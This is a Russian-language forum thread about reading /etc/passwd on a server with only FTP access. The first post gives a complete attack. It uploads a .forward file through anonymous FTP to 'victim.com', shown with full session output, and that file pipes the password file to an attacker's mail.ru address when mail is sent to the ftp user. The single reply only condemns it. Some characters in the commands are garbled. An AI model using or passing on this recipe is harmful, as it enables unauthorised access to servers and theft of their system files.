WASP.kz - Форум: Как прочитать /etc/passwd?

December 04 2024 23:50:23

Навигация

· Генеральная

· Материнские платы
· Контроллеры
· CPU - процессоры
· Память - RAM
· Видеокарты
· HDD, SSD, FDD
· CD - DVD - BD
· Звуковые карты
· Охлаждение ПК
· Корпуса ПК
· Электропитание
· Мониторы и ТВ
· Манипуляторы
· Ноутбуки, десктопы

· Интернет
· Принт и скан
· Фото-видео
· Мультимедиа
· Компьютеры - общая
· Программное
· Игры ПК
· Радиодело
· Производители

· Динамики, микрофоны
· Аппаратура

· Телевидение
· Безопасность
· Электроника / Быт
· Телефония
· Пульты - ПДУ
· Создание сайтов

· О сайте wasp.kz...

· Каталог ссылок

Последние статьи

· Азовчанка килька в т...
· Fish Master Шпроты -...
· Фасоль по-гречески с...
· Трезвость в Казахста...
· Сельдь Атлантическая...

Счетчики

- Темы форума
- Комментарии

О нет! Где JavaScript?
У Вашего браузера отключен JavaScript или он просто не поддерживает JavaScript. Пожалуйста включите JavaScript на Вашем веб-браузере для нормального просмотра данного веб-сайта,
или обновите свой браузер на поддерживаемый JavaScript; Firefox, Safari, Opera, Chrome или Internet Explorer не ниже, чем версия 6.

Просмотр темы

WASP.kz » ИНТЕРНЕТ, ЛОКАЛЬНЫЕ СЕТИ, САЙТЫ » Создание сайтов

Как прочитать /etc/passwd?
Nevillberger	#1 Опубликовано 19-06-2024 11:15
Новичок Сообщений: 4 Зарегистрирован: 19/06/2024 07:16	Как бы мне, имея FТР-доступ к серверу, прочитать /etc/passwd? Тебе для этого необходимо выполнить следующий ftp-сценарий со своего сервера Код bash# cat myforward_file "cat /etc/passwd \| /bin/mail hacker© mail.ru " bash# ftp victim.com Connected to victim.com 220 victim FTP server ready Name (victim.com:hacker):ftp 331 Guest login ok, send you e-mail as password. Password: 230 Guest login ok, access restrictions apply. ftp> ls -l 220 PORT command succesful. 150 Opening ASCII mode data connection for '/bin/ Is'. (192.168.1.1, 2335) (0 bytes) total 4 dr-xr-xr-x 2 root operator 512 Feb 28 2000 bin dr-xr-xr-x 2 root operator 512 Sep 18 2000 etc drwxrwxrwt 13 root operator 1024 Jul 1 00:55 incoming drwxr-xr-x 3 root operator 512 Feb 19 10:25 pub 226 Transfer complete. ftp>put myforward_file .forward ftp>quit bash# echo 'You a hacked' \| mail ftp© victim.com В итоге, когда почту отошлют юзеру ftр, выполнится .forward-файл. Если у демона будет достаточно прав для чтения/etc/passwd, то его содержимое придет к тебе на мыло * Изменил(а) wasp, 19-06-2024 12:11


Kolmar-X	#2 Опубликовано 15-07-2024 17:58
Пользователь Сообщений: 70 Зарегистрирован: 06/01/2023 11:36	Вот так вот весь вред в мире!

Перейти на форум:

Авторизация

Вы не зарегистрированы?
Нажмите здесь для регистрации.

Забыли пароль?
Запросите новый здесь.

Реклама Google

Время загрузки: 0.13 секунд - 19 Запросов

87,567,206 уникальных посетителей

Copyright © 2007 Михаил Дмитриенко Алма-Ата

Powered by PHP-Fusion Copyright © 2024 PHP-Fusion Inc